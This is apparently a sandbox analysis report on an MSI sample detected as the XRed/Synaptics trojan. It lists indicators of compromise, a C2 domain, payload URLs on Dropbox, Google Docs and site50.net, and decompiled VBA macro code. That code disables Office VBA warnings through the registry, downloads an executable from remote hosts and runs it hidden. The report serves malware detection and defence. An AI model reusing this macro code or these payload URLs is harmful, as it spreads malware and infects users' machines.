Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
valyzt.msi

Overview

General Information

Sample name:valyzt.msi
Analysis ID:1582346
MD5:53614b87538306b4f7437db8be2a0e47
SHA1:a6a777b24bb64067738386caa66787b8ed225726
SHA256:e86d059bd44bc6e4252972320cb811497ea87f3b0ef10eed5edfcd7acf44a3d8
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

XRed
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected XRed
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA macro which executes code when the document is opened / closed
May infect USB drives
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info

Classification

  • System is w11x64_office
  • msiexec.exe (PID: 7892 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi" MD5: C0D3BDDE74C1EC82F75681D4D5ED44C8)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
valyzt.msiJoeSecurity_XRedYara detected XRedJoe Security
    valyzt.msiJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: valyzt.msiMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
      Source: valyzt.msiReversingLabs: Detection: 65%
      Source: valyzt.msiBinary or memory string: [autorun]
      Source: valyzt.msiBinary or memory string: [autorun]
      Source: valyzt.msiBinary or memory string: autorun.inf

      Networking

      barindex
      Source: Malware configuration extractorURLs: xred.mooo.com
      Source: valyzt.msiString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Source: valyzt.msiString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
      Source: valyzt.msiString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
      Source: valyzt.msiString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
      Source: valyzt.msiString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
      Source: valyzt.msiString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Source: valyzt.msiString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
      Source: valyzt.msiString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
      Source: valyzt.msiString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
      Source: valyzt.msiString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

      System Summary

      barindex
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function SaveAsInj, String environ: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"Name: SaveAsInj
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyRead, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyRead
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyExists, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyExists
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeySave, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeySave
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: TMP = Environ("Temp") & "\~$cache1.exe"Name: MPS
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") ThenName: MPS
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHideName: MPS
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") ThenName: MPS
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHideName: MPS
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")Name: FDW
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")Name: FDW
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'ADODB.Stream' functions open, savetofile, writeName: FDW
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, sendName: FDW
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_BeforeCloseName: Workbook_BeforeClose
      Source: valyzt.msiBinary or memory string: OriginalFileName vs valyzt.msi
      Source: valyzt.msiBinary or memory string: OriginalFilenameb! vs valyzt.msi
      Source: classification engineClassification label: mal80.troj.expl.winMSI@1/0@0/0
      Source: Yara matchFile source: valyzt.msi, type: SAMPLE
      Source: valyzt.msiReversingLabs: Detection: 65%
      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: duser.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: atlthunk.dllJump to behavior
      Source: valyzt.msiStatic file information: File size 1748992 > 1048576
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: valyzt.msi, type: SAMPLE

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: valyzt.msi, type: SAMPLE
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information31
      Scripting
      1
      Replication Through Removable Media
      Windows Management Instrumentation31
      Scripting
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      OS Credential Dumping1
      Peripheral Device Discovery
      Remote ServicesData from Local System2
      Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      valyzt.msi66%ReversingLabsWin32.Trojan.Synaptics
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        xred.mooo.comfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://xred.site50.net/syn/Synaptics.rarvalyzt.msifalse
            high
            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1valyzt.msifalse
              high
              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1valyzt.msifalse
                high
                https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1valyzt.msifalse
                  high
                  http://xred.site50.net/syn/SSLLibrary.dllvalyzt.msifalse
                    high
                    http://xred.site50.net/syn/SUpdate.inivalyzt.msifalse
                      high
                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978valyzt.msifalse
                        high
                        No contacted IP infos
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582346
                        Start date and time:2024-12-30 11:41:02 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 50s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                        Run name:Potential for more IOCs and behavior
                        Number of analysed new started processes analysed:28
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:valyzt.msi
                        Detection:MAL
                        Classification:mal80.troj.expl.winMSI@1/0@0/0
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .msi
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 4.175.87.197, 20.199.58.43, 40.126.32.133
                        • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, x1.c.lencr.org, ocsp.digicert.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: valyzt.msi
                        No simulations
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        fp2e7a.wpc.phicdn.netdocx.msiGet hashmaliciousXRedBrowse
                        • 192.229.221.95
                        SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                        • 192.229.221.95
                        dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                        • 192.229.221.95
                        KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                        • 192.229.221.95
                        2GL073z1wL.exeGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        installer64v1.0.0.msiGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                        • 192.229.221.95
                        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                        • 192.229.221.95
                        No context
                        No context
                        No context
                        No created / dropped files found
                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                        Entropy (8bit):7.422118768157554
                        TrID:
                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                        File name:valyzt.msi
                        File size:1'748'992 bytes
                        MD5:53614b87538306b4f7437db8be2a0e47
                        SHA1:a6a777b24bb64067738386caa66787b8ed225726
                        SHA256:e86d059bd44bc6e4252972320cb811497ea87f3b0ef10eed5edfcd7acf44a3d8
                        SHA512:cfed71c6b9eb55b3ebfb53cbdb1611e8921a6dbe7b7efc5456cebb9bfb3d6a64f23a97c63415d61c38c4e3b540a79fd50cb2a080220bf3ea32edc98f85e6ecc1
                        SSDEEP:49152:PElnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZl:Gnsmtk2a1hlPERBsiT
                        TLSH:C985C0B2B3818436D433563C8C7B93A75427BE5D1D38690E3BE57E4E6E3A34228261D7
                        File Content Preview:........................>......................................................................................................................................................................................................................................
                        Icon Hash:bdb5fdd8b3b39b1f
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 30, 2024 11:41:52.283139944 CET1.1.1.1192.168.2.240xd705No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Dec 30, 2024 11:41:52.283139944 CET1.1.1.1192.168.2.240xd705No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                        Click to jump to process

                        Click to jump to process

                        Target ID:1
                        Start time:05:41:57
                        Start date:30/12/2024
                        Path:C:\Windows\System32\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi"
                        Imagebase:0x7ff6b7e50000
                        File size:176'128 bytes
                        MD5 hash:C0D3BDDE74C1EC82F75681D4D5ED44C8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Call Graph

                        Module: Sayfa1

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sayfa1"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: ThisWorkbook

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "ThisWorkbook"

                        2

                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        9

                        Dim SheetsChanged as Boolean

                        10

                        Dim SheetCount as Integer

                        APIsMeta Information

                        CreateObject

                        Path

                        ActiveWorkbook

                        Path

                        ActiveWorkbook

                        Environ

                        FileExists

                        FileExists

                        FileCopy

                        Shell

                        vbHide

                        FileExists

                        FileExists

                        FileCopy

                        Shell

                        vbHide

                        FileExists

                        Environ

                        Shell

                        Environ

                        vbHide

                        FileExists

                        Environ

                        Shell

                        Environ

                        vbHide

                        FileExists

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: AllowRedirects

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Send

                        Part of subcall function FDW@ThisWorkbook: Status

                        Part of subcall function FDW@ThisWorkbook: InStr

                        Part of subcall function FDW@ThisWorkbook: ResponseText

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Type

                        Part of subcall function FDW@ThisWorkbook: Write

                        Part of subcall function FDW@ThisWorkbook: ResponseBody

                        Part of subcall function FDW@ThisWorkbook: SaveToFile

                        Part of subcall function FDW@ThisWorkbook: Close

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: AllowRedirects

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Send

                        Part of subcall function FDW@ThisWorkbook: Status

                        Part of subcall function FDW@ThisWorkbook: InStr

                        Part of subcall function FDW@ThisWorkbook: ResponseText

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Type

                        Part of subcall function FDW@ThisWorkbook: Write

                        Part of subcall function FDW@ThisWorkbook: ResponseBody

                        Part of subcall function FDW@ThisWorkbook: SaveToFile

                        Part of subcall function FDW@ThisWorkbook: Close

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: Option

                        Part of subcall function FDW@ThisWorkbook: AllowRedirects

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Send

                        Part of subcall function FDW@ThisWorkbook: Status

                        Part of subcall function FDW@ThisWorkbook: InStr

                        Part of subcall function FDW@ThisWorkbook: ResponseText

                        Part of subcall function FDW@ThisWorkbook: CreateObject

                        Part of subcall function FDW@ThisWorkbook: Open

                        Part of subcall function FDW@ThisWorkbook: Type

                        Part of subcall function FDW@ThisWorkbook: Write

                        Part of subcall function FDW@ThisWorkbook: ResponseBody

                        Part of subcall function FDW@ThisWorkbook: SaveToFile

                        Part of subcall function FDW@ThisWorkbook: Close

                        FileExists

                        Shell

                        vbHide

                        Shell

                        vbHide

                        StringsDecrypted Strings
                        "scripting.filesystemobject"
                        "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                        "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                        "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                        "Temp"
                        "ALLUSERSPROFILE"
                        "ALLUSERSPROFILE"
                        "WINDIR"
                        "WINDIR"
                        LineInstructionMeta Information
                        147

                        Sub MPS()

                        148

                        Dim FSO as Object

                        149

                        Dim FP(1 To 3), TMP, URL(1 To 3) as String

                        151

                        Set FSO = CreateObject("scripting.filesystemobject")

                        CreateObject

                        152

                        FP(1) = ActiveWorkbook.Path & "\~$cache1"

                        Path

                        ActiveWorkbook

                        153

                        FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

                        Path

                        ActiveWorkbook

                        155

                        URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"

                        156

                        URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                        157

                        URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                        158

                        TMP = Environ("Temp") & "\~$cache1.exe"

                        Environ

                        160

                        If FSO.FileExists(FP(1)) Then

                        FileExists

                        161

                        If Not FSO.FileExists(TMP) Then

                        FileExists

                        162

                        FileCopy FP(1), TMP

                        FileCopy

                        163

                        Endif

                        164

                        Shell TMP, vbHide

                        Shell

                        vbHide

                        165

                        Elseif FSO.FileExists(FP(2)) Then

                        FileExists

                        166

                        If Not FSO.FileExists(TMP) Then

                        FileExists

                        167

                        FileCopy FP(2), TMP

                        FileCopy

                        168

                        Endif

                        169

                        Shell TMP, vbHide

                        Shell

                        vbHide

                        170

                        Else

                        171

                        If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then

                        FileExists

                        Environ

                        172

                        Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide

                        Shell

                        Environ

                        vbHide

                        173

                        Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then

                        FileExists

                        Environ

                        174

                        Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide

                        Shell

                        Environ

                        vbHide

                        175

                        Elseif Not FSO.FileExists(TMP) Then

                        FileExists

                        176

                        If FDW((URL(1)), (TMP)) Then

                        177

                        Elseif FDW((URL(2)), (TMP)) Then

                        178

                        Elseif FDW((URL(3)), (TMP)) Then

                        179

                        Endif

                        180

                        If FSO.FileExists(TMP) Then

                        FileExists

                        181

                        Shell TMP, vbHide

                        Shell

                        vbHide

                        182

                        Endif

                        183

                        Else

                        184

                        Shell TMP, vbHide

                        Shell

                        vbHide

                        185

                        Endif

                        187

                        Endif

                        189

                        End Sub

                        APIsMeta Information

                        Sheets

                        Sheets

                        xlSheetVisible

                        Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                        Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                        Version

                        Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                        Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                        Version

                        DisplayAlerts

                        Count

                        Worksheets

                        Part of subcall function MPS@ThisWorkbook: CreateObject

                        Part of subcall function MPS@ThisWorkbook: Path

                        Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                        Part of subcall function MPS@ThisWorkbook: Path

                        Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                        Part of subcall function MPS@ThisWorkbook: Environ

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: FileCopy

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: FileCopy

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: Environ

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: Environ

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: Environ

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: Environ

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: FileExists

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Part of subcall function MPS@ThisWorkbook: Shell

                        Part of subcall function MPS@ThisWorkbook: vbHide

                        Select

                        StringsDecrypted Strings
                        "HKCU\Software\Microsoft\Office\"
                        "REG_DWORD"
                        "HKCU\Software\Microsoft\Office\"
                        "REG_DWORD"
                        LineInstructionMeta Information
                        12

                        Private Sub Workbook_Open()

                        13

                        Dim i as Integer

                        14

                        For i = 1 To ActiveWorkbook.Sheets.Count

                        Sheets

                        15

                        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                        Sheets

                        xlSheetVisible

                        16

                        Next i

                        Sheets

                        18

                        RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"

                        Version

                        19

                        RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

                        Version

                        21

                        Application.DisplayAlerts = False

                        DisplayAlerts

                        22

                        SheetCount = Worksheets.Count

                        Count

                        Worksheets

                        24

                        Call MPS()

                        26

                        ActiveWorkbook.Sheets(1).Select

                        Select

                        27

                        SheetsChanged = False

                        28

                        End Sub

                        APIsMeta Information

                        CreateObject

                        CreateObject

                        Option

                        Option

                        AllowRedirects

                        Open

                        Send

                        Status

                        InStr

                        ResponseText

                        CreateObject

                        Open

                        Type

                        Write

                        ResponseBody

                        SaveToFile

                        Close

                        StringsDecrypted Strings
                        "WinHttp.WinHttpRequest.5.1"
                        "WinHttp.WinHttpRequest.5"
                        "WinHttp.WinHttpRequest.5"
                        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                        "GET"
                        "404 Not Found"
                        ">Not Found<"
                        "ADODB.Stream"
                        "Dropbox - Error"
                        "404 Not Found"
                        ">Not Found<"
                        "ADODB.Stream"
                        "Dropbox - Error"
                        "ADODB.Stream"
                        LineInstructionMeta Information
                        191

                        Function FDW(MYU, NMA as String) as Boolean

                        192

                        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")

                        CreateObject

                        193

                        If WinHttpReq Is Nothing Then

                        194

                        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

                        CreateObject

                        195

                        Endif

                        197

                        WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

                        Option

                        198

                        WinHttpReq.Option(6) = AllowRedirects

                        Option

                        AllowRedirects

                        199

                        WinHttpReq.Open "GET", MYU, False

                        Open

                        200

                        WinHttpReq.Send

                        Send

                        202

                        If (WinHttpReq.Status = 200) Then

                        Status

                        203

                        If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then

                        InStr

                        ResponseText

                        204

                        FDW = True

                        205

                        Set oStream = CreateObject("ADODB.Stream")

                        CreateObject

                        206

                        oStream.Open

                        Open

                        207

                        oStream.Type = 1

                        Type

                        208

                        oStream.Write WinHttpReq.ResponseBody

                        Write

                        ResponseBody

                        209

                        oStream.SaveToFile (NMA)

                        SaveToFile

                        210

                        oStream.Close

                        Close

                        211

                        Else

                        212

                        FDW = False

                        213

                        Endif

                        214

                        Else

                        215

                        FDW = False

                        216

                        Endif

                        217

                        End Function

                        APIsMeta Information

                        CreateObject

                        Environ

                        FileExists

                        FileExists

                        FileCopy

                        SetAttr

                        vbHidden

                        vbSystem

                        StringsDecrypted Strings
